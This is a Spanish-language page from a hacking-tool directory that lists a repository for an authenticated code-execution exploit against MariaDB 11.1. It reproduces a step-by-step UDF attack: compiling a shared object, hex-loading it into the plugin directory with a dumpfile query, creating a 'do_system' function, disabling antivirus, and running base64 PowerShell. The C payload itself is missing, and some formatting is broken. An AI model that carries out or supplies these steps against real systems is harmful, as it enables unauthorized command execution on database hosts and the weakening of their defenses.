Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Mysql_CVE-2024-27766 — Ejecución de código autenticada en base de datos | Kitploit
Herramientas/GitHubGitHub/hissec/mysql_cve-2024-27766
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de PayloadsSeguridad de Bases de Datos
GitHubhissec/mysql_cve-2024-27766

Mysql_CVE-2024-27766

Ejecución de código autenticada en base de datos

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Guía de Reproducción del Exploit (versión afectada del producto MariaDB 11.1)

Esta guía proporciona instrucciones paso a paso para reproducir un ataque de Función Definida por el Usuario (UDF) en un sistema de base de datos. Tenga en cuenta que este exploit puede funcionar en algunos sistemas, pero podría no funcionar correctamente en arquitecturas de 64 bits o ciertas compilaciones.

Advertencia: Esto es solo con fines educativos. El uso no autorizado de estas técnicas es ilegal y poco ético.

Pasos para Reproducir el Ataque

1. Descargar y Preparar el Código UDF

Primero, cree un archivo llamado exploit.c y agregue el siguiente código:

root@kitploit:~

### 2. Compilar el Código UDF

Compile el código del exploit usando el compilador `x86_64-w64-mingw32-gcc`:

```bash
x86_64-w64-mingw32-gcc -g -c exploit.c

3. Crear un Archivo de Objeto Compartido

Genere un archivo de objeto compartido (exploit.so) a partir del archivo objeto compilado:

root@kitploit:~
x86_64-w64-mingw32-gcc -g -shared -Wl,-soname,exploit.so -o exploit.so exploit.o

4. Convertir el Archivo de Objeto Compartido a Hexadecimal

Use xxd para convertir el archivo .so a un formato hexadecimal:

root@kitploit:~
xxd -p exploit.so | tr -d '\n' > hex_value.txt

5. Cargar el Valor Hexadecimal en la Base de Datos

Copie el valor hexadecimal de hex_value.txt y ejecute el siguiente comando en su base de datos:

root@kitploit:~
DB> set @shell = 0x<hex_value>;

6. Determinar el Directorio de Plugins e Implementar el Exploit

Encuentre el directorio de plugins ejecutando:

root@kitploit:~
DB> select @@plugin_dir;

Luego, cree el objeto compartido del exploit en el directorio de plugins:

root@kitploit:~
DB> select binary @shell into dumpfile 'C:\\Program Files\\MariaDB 11.1\\lib\\plugin\\exploit.so';

Nota: Ajuste la ruta según la configuración de su sistema o el directorio de plugins específico.

7. Crear la Función Maliciosa

Cree una nueva función en la base de datos usando el exploit:

root@kitploit:~
DB> create function do_system returns integer soname 'exploit.so';

8. Ejecutar el Exploit

Desactive cualquier antivirus o Windows Defender que pueda bloquear el exploit. Luego, ejecute un comando usando la función recién creada:

root@kitploit:~
DB> select do_system('powershell base64 here');

Reemplace 'powershell base64 here' con el payload codificado en base64 del comando que desea ejecutar.


Descargo de responsabilidad: Este documento está destinado únicamente a fines educativos e investigación de seguridad. El mal uso de esta información puede resultar en cargos penales y severas sanciones legales. Siempre obtenga permiso de las autoridades pertinentes antes de probar cualquier vulnerabilidad en una red o sistema.

Descargar herramienta